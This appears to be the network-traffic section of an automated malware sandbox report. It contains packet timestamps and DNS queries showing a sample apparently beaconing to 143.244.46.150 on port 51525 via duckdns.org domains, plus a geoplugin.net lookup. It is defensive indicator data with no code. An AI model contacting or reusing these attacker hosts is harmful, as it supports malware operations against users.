                                                                                                          Oct 28, 2024 09:23:00.356951952 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:00.356962919 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:00.356972933 CET5211551525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:23:00.356976032 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:00.356993914 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:00.356993914 CET5211551525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:23:00.357004881 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:00.357016087 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:00.357016087 CET5211551525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:23:00.357027054 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:00.357038975 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:00.357043982 CET5211551525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:23:00.357049942 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:00.357063055 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:00.357073069 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:00.357079983 CET5211551525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:23:00.357084990 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:00.357096910 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:00.357100010 CET5211551525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:23:00.357109070 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:00.357120037 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:00.357121944 CET5211551525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:23:00.357131004 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:00.357141018 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:00.357150078 CET5211551525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:23:00.357151985 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:00.357163906 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:00.357178926 CET5211551525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:23:00.357178926 CET5211551525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:23:00.357187033 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:00.357198000 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:00.357204914 CET5211551525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:23:00.357253075 CET5211551525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:23:00.357301950 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:00.357343912 CET5211551525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:23:00.360039949 CET5211551525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:23:02.779695034 CET5152552104143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:02.787882090 CET5210451525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:23:02.793329000 CET5152552104143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:02.812184095 CET5211551525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:23:02.817701101 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:02.817759037 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:02.817786932 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:02.817800045 CET5211551525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:23:02.817814112 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:02.817840099 CET5211551525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:23:02.817840099 CET5211551525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:23:02.817883968 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:02.817931890 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:02.817959070 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:02.817986012 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:02.818010092 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:02.818021059 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:02.823204041 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:02.823287010 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:02.823304892 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:02.823321104 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:02.823440075 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:02.823489904 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:02.823499918 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:02.845196962 CET5211551525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:23:02.850903988 CET5152552115143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:02.850986004 CET5211551525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:23:32.859384060 CET5152552104143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:23:32.878474951 CET5210451525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:23:32.883910894 CET5152552104143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:24:02.938898087 CET5152552104143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:24:02.940933943 CET5210451525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:24:02.946332932 CET5152552104143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:24:24.935950994 CET5211680192.168.2.6178.237.33.50
                                                                                                          Oct 28, 2024 09:24:25.342017889 CET5211680192.168.2.6178.237.33.50
                                                                                                          Oct 28, 2024 09:24:26.045665026 CET5211680192.168.2.6178.237.33.50
                                                                                                          Oct 28, 2024 09:24:27.342020988 CET5211680192.168.2.6178.237.33.50
                                                                                                          Oct 28, 2024 09:24:29.843388081 CET5211680192.168.2.6178.237.33.50
                                                                                                          Oct 28, 2024 09:24:33.012403965 CET5152552104143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:24:33.015574932 CET5210451525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:24:33.021015882 CET5152552104143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:24:34.732652903 CET5211680192.168.2.6178.237.33.50
                                                                                                          Oct 28, 2024 09:24:44.342070103 CET5211680192.168.2.6178.237.33.50
                                                                                                          Oct 28, 2024 09:25:03.073281050 CET5152552104143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:25:03.075254917 CET5210451525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:25:03.080746889 CET5152552104143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:25:33.136878014 CET5152552104143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:25:33.138556957 CET5210451525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:25:33.145014048 CET5152552104143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:25:58.635684967 CET5152552104143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:25:58.830492020 CET5213951525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:25:58.836124897 CET5152552139143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:25:58.836216927 CET5213951525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:25:58.845861912 CET5152552104143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:25:58.849797964 CET5210451525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:25:58.871757030 CET5213951525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:25:58.877393007 CET5152552139143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:25:58.924164057 CET5214051525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:25:58.929637909 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:25:58.929757118 CET5214051525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:25:58.933629036 CET5214051525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:25:58.938970089 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:25:59.868802071 CET5152552139143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:25:59.968046904 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:00.045258999 CET5213951525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:00.045316935 CET5214051525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:00.080317974 CET5152552139143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:00.088982105 CET5213951525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:00.094423056 CET5152552139143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:00.095375061 CET5213951525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:00.100892067 CET5152552139143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:00.100954056 CET5213951525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:00.106336117 CET5152552139143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:00.178658962 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:00.189408064 CET5214051525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:00.195370913 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:00.195452929 CET5214051525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:00.200885057 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:00.421746016 CET5214051525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:00.427248001 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:00.427263021 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:00.427282095 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:00.427294016 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:00.427305937 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:00.427310944 CET5214051525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:00.427347898 CET5214051525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:00.427364111 CET5214051525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:00.427403927 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:00.427423954 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:00.427447081 CET5214051525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:00.427478075 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:00.427488089 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:00.427700996 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:00.432785034 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:00.432796001 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:00.432845116 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:00.432863951 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:00.432913065 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:00.432923079 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:00.432986975 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:00.433007956 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:00.433026075 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:01.138818979 CET5213951525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:01.144306898 CET5152552139143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:01.612797022 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:01.654630899 CET5214051525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:01.894689083 CET5214051525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:01.896495104 CET5214051525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:01.974728107 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:01.974855900 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:01.975001097 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:01.975053072 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:01.975094080 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:01.975156069 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:01.975166082 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:01.975173950 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:01.975178957 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:01.975189924 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:01.975199938 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:01.975420952 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:01.975435972 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:01.975446939 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:01.975485086 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:01.975524902 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:01.976018906 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:02.140152931 CET5213951525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:02.145607948 CET5152552139143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:02.475402117 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:02.545293093 CET5214051525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:02.706170082 CET5214051525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:02.707518101 CET5214051525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:02.711776018 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:02.711792946 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:02.711803913 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:02.711816072 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:02.711826086 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:02.711869955 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:02.711880922 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:02.711891890 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:02.711900949 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:02.712064028 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:02.712074041 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:02.712162971 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:02.712172985 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:02.712182045 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:02.712872028 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:02.712882042 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:02.716907024 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:02.716928959 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:02.716944933 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:02.716999054 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:02.717016935 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:02.717026949 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:03.158782959 CET5213951525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:03.164290905 CET5152552139143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:03.211021900 CET5152552104143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:03.213000059 CET5210451525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:03.218580961 CET5152552104143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:03.506061077 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:03.654633999 CET5214051525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:03.901398897 CET5214051525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:03.903040886 CET5214051525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:03.908085108 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:03.908101082 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:03.908113956 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:03.908127069 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:03.908135891 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:03.909482956 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:03.909502983 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:03.909539938 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:03.909603119 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:03.910079002 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:03.914103985 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:03.914144993 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:03.914155006 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:03.914191008 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:03.914200068 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:03.915386915 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:03.915406942 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:03.915416956 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:03.915447950 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:03.915460110 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:03.916408062 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:03.916435957 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:04.171766043 CET5213951525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:04.177279949 CET5152552139143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:04.508363008 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:04.655128956 CET5214051525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:05.174660921 CET5214051525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:05.175987005 CET5214051525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:05.180250883 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:05.180280924 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:05.180305004 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:05.180315018 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:05.180324078 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:05.180334091 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:05.180350065 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:05.180361032 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:05.180381060 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:05.180392027 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:05.185694933 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:05.185704947 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:05.185740948 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:05.185751915 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:05.185760975 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:05.185805082 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:05.185815096 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:05.185822964 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:05.185833931 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:05.185843945 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:05.185863972 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:05.185877085 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:05.187196970 CET5213951525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:05.192557096 CET5152552139143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:05.280474901 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:05.281187057 CET5152552139143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:05.283602953 CET5214051525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:05.283632040 CET5213951525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:05.451504946 CET5214051525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:05.456958055 CET5152552140143.244.46.150192.168.2.6
                                                                                                          Oct 28, 2024 09:26:06.202840090 CET5213951525192.168.2.6143.244.46.150
                                                                                                          Oct 28, 2024 09:26:06.208342075 CET5152552139143.244.46.150192.168.2.6
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Oct 28, 2024 09:22:04.695929050 CET5091853192.168.2.61.1.1.1
                                                                                                          Oct 28, 2024 09:22:04.832650900 CET53509181.1.1.1192.168.2.6
                                                                                                          Oct 28, 2024 09:22:21.818236113 CET53532981.1.1.1192.168.2.6
                                                                                                          Oct 28, 2024 09:22:38.910166025 CET6037353192.168.2.61.1.1.1
                                                                                                          Oct 28, 2024 09:22:39.317091942 CET53603731.1.1.1192.168.2.6
                                                                                                          Oct 28, 2024 09:22:46.856915951 CET5355653192.168.2.61.1.1.1
                                                                                                          Oct 28, 2024 09:22:47.858166933 CET5355653192.168.2.61.1.1.1
                                                                                                          Oct 28, 2024 09:22:48.859616995 CET5355653192.168.2.61.1.1.1
                                                                                                          Oct 28, 2024 09:22:50.870114088 CET5355653192.168.2.61.1.1.1
                                                                                                          Oct 28, 2024 09:22:51.083731890 CET53535561.1.1.1192.168.2.6
                                                                                                          Oct 28, 2024 09:22:51.083741903 CET53535561.1.1.1192.168.2.6
                                                                                                          Oct 28, 2024 09:22:51.083746910 CET53535561.1.1.1192.168.2.6
                                                                                                          Oct 28, 2024 09:22:51.083750963 CET53535561.1.1.1192.168.2.6
                                                                                                          Oct 28, 2024 09:22:51.235179901 CET5925653192.168.2.61.1.1.1
                                                                                                          Oct 28, 2024 09:22:52.232949018 CET5925653192.168.2.61.1.1.1
                                                                                                          Oct 28, 2024 09:22:52.858803988 CET53592561.1.1.1192.168.2.6
                                                                                                          Oct 28, 2024 09:22:52.858836889 CET53592561.1.1.1192.168.2.6
                                                                                                          Oct 28, 2024 09:22:54.921185970 CET6287053192.168.2.61.1.1.1
                                                                                                          Oct 28, 2024 09:22:55.523525000 CET53628701.1.1.1192.168.2.6
                                                                                                          Oct 28, 2024 09:22:57.372576952 CET5069753192.168.2.61.1.1.1
                                                                                                          Oct 28, 2024 09:22:57.391422987 CET53506971.1.1.1192.168.2.6
                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Oct 28, 2024 09:22:04.695929050 CET192.168.2.61.1.1.10x96b8Standard query (0)evesecret.maA (IP address)IN (0x0001)false
                                                                                                          Oct 28, 2024 09:22:38.910166025 CET192.168.2.61.1.1.10xc32cStandard query (0)plieltd.topA (IP address)IN (0x0001)false
                                                                                                          Oct 28, 2024 09:22:46.856915951 CET192.168.2.61.1.1.10xc74fStandard query (0)odinga.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 28, 2024 09:22:47.858166933 CET192.168.2.61.1.1.10xc74fStandard query (0)odinga.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 28, 2024 09:22:48.859616995 CET192.168.2.61.1.1.10xc74fStandard query (0)odinga.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 28, 2024 09:22:50.870114088 CET192.168.2.61.1.1.10xc74fStandard query (0)odinga.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 28, 2024 09:22:51.235179901 CET192.168.2.61.1.1.10x4446Standard query (0)updated212.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 28, 2024 09:22:52.232949018 CET192.168.2.61.1.1.10x4446Standard query (0)updated212.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 28, 2024 09:22:54.921185970 CET192.168.2.61.1.1.10xe8c1Standard query (0)odinga.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 28, 2024 09:22:57.372576952 CET192.168.2.61.1.1.10xb9aaStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Oct 28, 2024 09:22:04.832650900 CET1.1.1.1192.168.2.60x96b8No error (0)evesecret.ma37.230.62.86A (IP address)IN (0x0001)false
                                                                                                          Oct 28, 2024 09:22:39.317091942 CET1.1.1.1192.168.2.60xc32cNo error (0)plieltd.top104.21.56.189A (IP address)IN (0x0001)false
                                                                                                          Oct 28, 2024 09:22:39.317091942 CET1.1.1.1192.168.2.60xc32cNo error (0)plieltd.top172.67.155.139A (IP address)IN (0x0001)false
                                                                                                          Oct 28, 2024 09:22:51.083731890 CET1.1.1.1192.168.2.60xc74fServer failure (2)odinga.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                          Oct 28, 2024 09:22:51.083741903 CET1.1.1.1192.168.2.60xc74fServer failure (2)odinga.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                          Oct 28, 2024 09:22:51.083746910 CET1.1.1.1192.168.2.60xc74fServer failure (2)odinga.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                          Oct 28, 2024 09:22:51.083750963 CET1.1.1.1192.168.2.60xc74fServer failure (2)odinga.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                          Oct 28, 2024 09:22:52.858803988 CET1.1.1.1192.168.2.60x4446No error (0)updated212.duckdns.org143.244.46.150A (IP address)IN (0x0001)false
